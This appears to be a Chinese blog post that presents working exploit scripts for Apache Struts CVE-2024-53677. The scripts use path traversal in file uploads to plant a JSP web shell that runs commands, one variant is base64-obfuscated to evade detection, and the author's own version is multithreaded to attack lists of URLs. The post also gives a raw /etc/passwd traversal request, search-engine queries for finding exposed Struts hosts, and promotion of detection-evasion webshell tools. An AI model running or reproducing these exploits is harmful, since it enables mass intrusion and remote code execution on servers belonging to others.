Apache Struts RCE (CVE-2024-53677)

前言

对目前的Apache Struts RCE (CVE-2024-53677)的poc进行总结，由于只能单个ip验证，所以自己更改一下代码，实现：多线程读取url验证并保存，更改为中文解释

免责声明

请勿利用文章内的相关技术从事非法测试，由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失，均由使用者本人负责，所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

往期推荐

14w+poc，nuclei全家桶：nuclei模版管理工具+Nuclei

哥斯拉二开，免杀绕过+规避流量检测设备

fscan全家桶：FscanPlus，fs，fscan适用低版本系统，FscanParser

自动爬取url地址，检测sql注入漏洞，sqlmc安装+使用

一键转换订阅为代理池工具+白嫖思路

TestNet，安装+使用，可以代替灯塔

python实现

参考大佬的poc：https://github.com/TAM-K592/CVE-2024-53677-S2-067/
Apache Struts 的以下版本受到影响：2.0.0 至 2.5.33，6.0.0 至 6.3.0.2

根据poc的最近几天的历史，目前网上的最终版本是base64混淆，是昨天中文出来的（2024.12.18中午）
https://github.com/TAM-K592/CVE-2024-53677-S2-067/

我在大佬的基础上进行了一些修改

• 变成了多线程
• 解释变成了中文

usage: CVE-2024-53677-S2-067-thread.py [-h] (-u URL | -f FILE) --upload_endpoint UPLOAD_ENDPOINT [--paths PATHS [PATHS ...]][--filenames FILENAMES [FILENAMES ...]] [--payload PAYLOAD] [-s THREADS] [-o OUTPUT]S2-067 Exploit - 多线程文件上传支持并从文件中读取URLoptions:-h, --help            show this help message and exit-u URL, --url URL     目标基础URL（例如：http://example.com）-f FILE, --file FILE  包含目标基础URL的文件路径，每行一个URL--upload_endpoint UPLOAD_ENDPOINT上传端点路径（例如：/uploads.action）--paths PATHS [PATHS ...]路径遍历测试路径--filenames FILENAMES [FILENAMES ...]自定义载荷文件名--payload PAYLOAD     自定义JSP载荷内容-s THREADS, --threads THREADS使用的线程数量（默认: 5）-o OUTPUT, --output OUTPUT输出成功URL的文件路径（默认：success.txt）

地址：https://github.com/dustblessnotdust/CVE-2024-53677-S2-067-thread
源代码在下面

检测文件上传是否上传成功，不执行命令

import requests
import argparse
import logging
from urllib.parse import urljoin
from requests_toolbelt.multipart.encoder import MultipartEncoder
import random# Configure logging
logging.basicConfig(level=logging.INFO,format="%(asctime)s [%(levelname)s] %(message)s",handlers=[logging.StreamHandler()]
)def detect_vulnerability(target_url, upload_endpoint):"""Non-destructive detection of CVE-2024-53677."""logging.info("Starting detection for CVE-2024-53677 (S2-067)...")upload_url = urljoin(target_url, upload_endpoint)test_filename = "../../vuln_test.txt"harmless_content = "S2-067 detection test."# Attempt to overwrite file name using OGNL bindingfiles = {"upload": ("test.txt", harmless_content, "text/plain"),"top.uploadFileName": test_filename  # Attempt filename overwrite}# Custom Content-Type boundaryboundary = "----WebKitFormBoundary" + "".join(random.choices("abcdefghijklmnopqrstuvwxyz0123456789", k=16))m = MultipartEncoder(fields=files, boundary=boundary)headers = {"User-Agent": "Mozilla/5.0","Content-Type": m.content_type}logging.info(f"Sending test request to upload endpoint: {upload_url}")try:# Send file upload requestresponse = requests.post(upload_url, headers=headers, data=m, timeout=10)# Analyze HTTP responseif response.status_code == 200:logging.info("[INFO] File upload request succeeded.")if "vuln_test.txt" in response.text:logging.warning("[ALERT] File name overwrite detected. Target may be vulnerable!")else:logging.info("[INFO] Target does not appear vulnerable.")elif response.status_code in [403, 401]:logging.info("[INFO] Access denied. Ensure proper permissions.")else:logging.info(f"[INFO] Unexpected HTTP response: {response.status_code}")except requests.exceptions.RequestException as e:logging.error(f"[ERROR] Request failed: {e}")def main():parser = argparse.ArgumentParser(description="CVE-2024-53677 (S2-067) Non-destructive Detection Tool")parser.add_argument("-u", "--url", required=True, help="Target base URL (e.g., http://example.com)")parser.add_argument("--upload_endpoint", required=True, help="Path to file upload endpoint (e.g., /upload.action)")args = parser.parse_args()logging.info("Starting detection process...")detect_vulnerability(args.url, args.upload_endpoint)logging.info("Detection process completed.")if __name__ == "__main__":main()

没有进行base64混淆

import requests
import argparse
from urllib.parse import urljoin
from requests_toolbelt.multipart.encoder import MultipartEncoder
import random
import stringdef generate_random_filename(extension=".jsp", length=8):"""Generate a random filename."""return ''.join(random.choices(string.ascii_letters + string.digits, k=length)) + extensiondef create_payload():"""Generate a simple JSP payload for testing RCE."""return """<%@ page import="java.io.*" %>
<%String cmd = request.getParameter("cmd");if (cmd != null) {Process p = Runtime.getRuntime().exec(cmd);BufferedReader in = new BufferedReader(new InputStreamReader(p.getInputStream()));String line;while ((line = in.readLine()) != null) {out.println(line);}}
%>"""def upload_multiple_files(target_url, upload_endpoint, payload, paths, filenames):"""Upload multiple payload files using parameter overwrite and path traversal."""upload_url = urljoin(target_url, upload_endpoint)print(f"[INFO] Target upload endpoint: {upload_url}")headers = {"User-Agent": "Mozilla/5.0"}boundary = '----WebKitFormBoundary' + ''.join(random.choices(string.ascii_letters + string.digits, k=16))for path in paths:files_payload = {}print(f"\n[INFO] Testing path traversal with base path: {path}")for index, filename in enumerate(filenames):modified_filename = f"{path}/{filename}"key_file = f"upload[{index}]"key_name = f"uploadFileName[{index}]"files_payload[key_file] = (filename, payload, "application/octet-stream")files_payload[key_name] = modified_filenameprint(f"[INFO] File {index + 1}: {modified_filename}")m = MultipartEncoder(fields=files_payload, boundary=boundary)headers["Content-Type"] = m.content_typetry:response = requests.post(upload_url, headers=headers, data=m, timeout=10)if response.status_code == 200:print("[SUCCESS] Payload uploaded. Verifying...")for filename in filenames:verify_uploaded_file(target_url, f"{path}/{filename}")else:print(f"[ERROR] Upload failed. HTTP {response.status_code}")except requests.RequestException as e:print(f"[ERROR] Request failed: {e}")def verify_uploaded_file(target_url, file_path):"""Verify if the uploaded payload file is accessible and can execute commands."""file_url = urljoin(target_url, file_path)print(f"[INFO] Verifying uploaded file: {file_url}")try:response = requests.get(file_url, timeout=10)if response.status_code == 200:print(f"[ALERT] File uploaded and accessible: {file_url}?cmd=whoami")else:print(f"[INFO] File not accessible. HTTP Status: {response.status_code}")except requests.RequestException as e:print(f"[ERROR] Verification failed: {e}")def main():parser = argparse.ArgumentParser(description="S2-067 Exploit - Multi-file Upload Support")parser.add_argument("-u", "--url", required=True, help="Target base URL (e.g., http://example.com)")parser.add_argument("--upload_endpoint", required=True, help="Path to upload endpoint (e.g., /uploads.action)")parser.add_argument("--paths", nargs="+", default=["../../../../../webapps/ROOT", "/tmp"],help="Paths for path traversal testing")parser.add_argument("--filenames", nargs="+",help="Custom filenames for payloads",default=[generate_random_filename() for _ in range(3)])parser.add_argument("--payload", help="Custom JSP payload content", default=create_payload())args = parser.parse_args()print("[INFO] Starting S2-067 Multi-file Upload Exploit...")upload_multiple_files(args.url.rstrip("/"), args.upload_endpoint, args.payload, args.paths, args.filenames)print("\n[INFO] Exploit process completed.")if __name__ == "__main__":main()

进行了base64混淆

import requests
import argparse
import base64
import random
import string
from urllib.parse import urljoin
from requests_toolbelt.multipart.encoder import MultipartEncoderdef generate_random_filename(extension=".jsp", length=8):"""Generate a random filename."""return ''.join(random.choices(string.ascii_letters + string.digits, k=length)) + extensiondef create_obfuscated_payload():"""Generate an obfuscated JSP payload for testing RCE.Avoid direct detection by encoding and decoding commands dynamically."""payload_base64 = base64.b64encode("""
<%@ page import="java.io.*" %>
<%String cmd = request.getParameter("cmd");if (cmd != null) {Process p = Runtime.getRuntime().exec(cmd);BufferedReader in = new BufferedReader(new InputStreamReader(p.getInputStream()));StringBuilder output = new StringBuilder();String line;while ((line = in.readLine()) != null) {output.append(line).append("\\n");}out.println(output.toString());}
%>
""".strip().encode()).decode()jsp_payload = f"""<%@ page import="java.util.Base64, java.nio.charset.StandardCharsets" %>
<%String encodedPayload = "{payload_base64}";byte[] decodedBytes = Base64.getDecoder().decode(encodedPayload);String decoded = new String(decodedBytes, StandardCharsets.UTF_8);out.println(decoded);// Execute dynamically decoded payloadrequest.getRequestDispatcher("temp.jsp").include(request, response);
%>"""return jsp_payloaddef upload_multiple_files(target_url, upload_endpoint, payload, paths, filenames):"""Upload multiple payload files using parameter overwrite and path traversal."""upload_url = urljoin(target_url, upload_endpoint)print(f"[INFO] Target upload endpoint: {upload_url}")headers = {"User-Agent": "Mozilla/5.0"}boundary = '----WebKitFormBoundary' + ''.join(random.choices(string.ascii_letters + string.digits, k=16))for path in paths:files_payload = {}print(f"\n[INFO] Testing path traversal with base path: {path}")for index, filename in enumerate(filenames):modified_filename = f"{path}/{filename}"key_file = f"upload[{index}]"key_name = f"uploadFileName[{index}]"files_payload[key_file] = (filename, payload, "application/octet-stream")files_payload[key_name] = modified_filenameprint(f"[INFO] File {index + 1}: {modified_filename}")m = MultipartEncoder(fields=files_payload, boundary=boundary)headers["Content-Type"] = m.content_typetry:response = requests.post(upload_url, headers=headers, data=m, timeout=10)if response.status_code == 200:print("[SUCCESS] Payload uploaded. Verifying...")for filename in filenames:verify_uploaded_file(target_url, f"{path}/{filename}")else:print(f"[ERROR] Upload failed. HTTP {response.status_code}")except requests.RequestException as e:print(f"[ERROR] Request failed: {e}")def verify_uploaded_file(target_url, file_path):"""Verify if the uploaded payload file is accessible."""file_url = urljoin(target_url, file_path)print(f"[INFO] Verifying uploaded file: {file_url}")try:response = requests.get(file_url, timeout=10)if response.status_code == 200:print(f"[ALERT] File uploaded and accessible: {file_url}?cmd=whoami")else:print(f"[INFO] File not accessible. HTTP Status: {response.status_code}")except requests.RequestException as e:print(f"[ERROR] Verification failed: {e}")def main():parser = argparse.ArgumentParser(description="S2-067 Exploit - Multi-file Upload Support")parser.add_argument("-u", "--url", required=True, help="Target base URL (e.g., http://example.com)")parser.add_argument("--upload_endpoint", required=True, help="Path to upload endpoint (e.g., /uploads.action)")parser.add_argument("--paths", nargs="+", default=["../../../../../webapps/ROOT", "/tmp"],help="Paths for path traversal testing")parser.add_argument("--filenames", nargs="+",help="Custom filenames for payloads",default=[generate_random_filename() for _ in range(3)])parser.add_argument("--payload", help="Custom JSP payload content", default=create_obfuscated_payload())args = parser.parse_args()print("[INFO] Starting S2-067 Multi-file Upload Exploit...")upload_multiple_files(args.url.rstrip("/"), args.upload_endpoint, args.payload, args.paths, args.filenames)print("\n[INFO] Exploit process completed.")if __name__ == "__main__":main()

多线程中文

使用截图

代码部分

import requests  
import argparse  
import base64  
import random  
import string  
from urllib.parse import urljoin  
from requests_toolbelt.multipart.encoder import MultipartEncoder  
from concurrent.futures import ThreadPoolExecutor  def generate_random_filename(extension=".jsp", length=8):  """生成随机文件名。"""  return ''.join(random.choices(string.ascii_letters + string.digits, k=length)) + extension  def create_obfuscated_payload():  """  生成一个用于测试RCE的混淆JSP载荷。  通过动态编码和解码命令以避免直接检测。  """    payload_base64 = base64.b64encode("""  
<%@ page import="java.io.*" %>  
<%  String cmd = request.getParameter("cmd");    if (cmd != null) {        Process p = Runtime.getRuntime().exec(cmd);        BufferedReader in = new BufferedReader(new InputStreamReader(p.getInputStream()));        StringBuilder output = new StringBuilder();        String line;        while ((line = in.readLine()) != null) {            output.append(line).append("\\n");  }        out.println(output.toString());    }%>  
""".strip().encode()).decode()  jsp_payload = f"""<%@ page import="java.util.Base64, java.nio.charset.StandardCharsets" %>  
<%  String encodedPayload = "{payload_base64}";  byte[] decodedBytes = Base64.getDecoder().decode(encodedPayload);    String decoded = new String(decodedBytes, StandardCharsets.UTF_8);    out.println(decoded);    // 动态执行解码后的载荷  request.getRequestDispatcher("temp.jsp").include(request, response);%>"""  return jsp_payload  def upload_and_verify_file(upload_url, headers, files_payload, path, filename):  m = MultipartEncoder(fields=files_payload, boundary='----WebKitFormBoundary' + ''.join(random.choices(string.ascii_letters + string.digits, k=16)))  headers["Content-Type"] = m.content_type  try:  response = requests.post(upload_url, headers=headers, data=m, timeout=10)  if response.status_code == 200:  print("[成功] 载荷上传成功。正在验证...")  verify_uploaded_file(upload_url.split('/uploads')[0], f"{path}/{filename}")  else:  print(f"[错误] 上传失败。HTTP 状态码 {response.status_code} 文件 {filename}")  except requests.RequestException as e:  print(f"[错误] 请求失败: {e}")  def verify_uploaded_file(target_url, file_path):  """验证上传的载荷文件是否可访问。"""  file_url = urljoin(target_url, file_path)  print(f"[信息] 正在验证上传文件: {file_url}")  try:  response = requests.get(file_url, timeout=10)  if response.status_code == 200:  print(f"[警告] 文件上传并可访问: {file_url}?cmd=whoami")  else:  print(f"[信息] 文件不可访问。HTTP 状态码: {response.status_code} 文件 {file_path}")  except requests.RequestException as e:  print(f"[错误] 验证失败: {e}")  def read_urls_from_file(file_path):  """从文件中读取URL，每行一个。"""  urls = []  try:  with open(file_path, 'r') as file:  for line in file:  url = line.strip()  if url:  urls.append(url)  except FileNotFoundError:  print(f"[错误] 文件未找到: {file_path}")  except Exception as e:  print(f"[错误] 读取文件时出错: {e}")  return urls  def main():  parser = argparse.ArgumentParser(description="S2-067 Exploit - 多线程文件上传支持并从文件中读取URL")  group = parser.add_mutually_exclusive_group(required=True)  group.add_argument("-u", "--url", help="目标基础URL（例如：http://example.com）")  group.add_argument("-f", "--file", help="包含目标基础URL的文件路径，每行一个URL")  parser.add_argument("--upload_endpoint", required=True, help="上传端点路径（例如：/uploads.action）")  parser.add_argument("--paths", nargs="+", default=["../../../../../webapps/ROOT", "/tmp"],  help="路径遍历测试路径")  parser.add_argument("--filenames", nargs="+",  help="自定义载荷文件名",  default=[generate_random_filename() for _ in range(3)])  parser.add_argument("--payload", help="自定义JSP载荷内容", default=create_obfuscated_payload())  parser.add_argument("-s", "--threads", type=int, default=5, help="使用的线程数量（默认: 5）")  args = parser.parse_args()  headers = {"User-Agent": "Mozilla/5.0"}  if args.file:  urls = read_urls_from_file(args.file)  if not urls:  print("[错误] 指定文件中没有有效的URL。")  return  else:  urls = [args.url.rstrip("/")]  for target_url in urls:  print(f"\n[信息] 正在处理目标URL: {target_url}")  upload_url = urljoin(target_url, args.upload_endpoint)  with ThreadPoolExecutor(max_workers=args.threads) as executor:  futures = []  for path in args.paths:  files_payload = {}  print(f"\n[信息] 使用基路径进行路径遍历测试: {path}")  for index, filename in enumerate(args.filenames):  modified_filename = f"{path}/{filename}"  key_file = f"upload[{index}]"  key_name = f"uploadFileName[{index}]"  files_payload[key_file] = (filename, args.payload, "application/octet-stream")  files_payload[key_name] = modified_filename  print(f"[信息] 文件 {index + 1}: {modified_filename}")  future = executor.submit(upload_and_verify_file, upload_url, headers.copy(), files_payload, path, filename)  futures.append(future)  for future in futures:  future.result()  print("\n[信息] 攻击过程完成。")  if __name__ == "__main__":  main()

漏洞poc

如果不想使用Python只想验证是否存在，可以使用burpsuite或者yakit

Fofa语法

app="Struts2"

quake语法

app:"Apache Struts2"

个人中心输入邀请码“1CWUGm”你我均可获得5,000长效积分哦，地址 quake.360.net

poc

POST /upload HTTP/1.1
Host: {{file:line(C:\Users\lenovo\Desktop\漏洞挖掘\数据处理\output_1.txt)}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36
Content-Length: 220
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryXToNPRY2YGK82Cfc
Upgrade-Insecure-Requests: 1------WebKitFormBoundaryXToNPRY2YGK82Cfc
Content-Disposition: form-data; name="file"; filename="../../../../../../../etc/passwd"
Content-Type: application/octet-stream1
------WebKitFormBoundaryXToNPRY2YGK82Cfc--

验证截图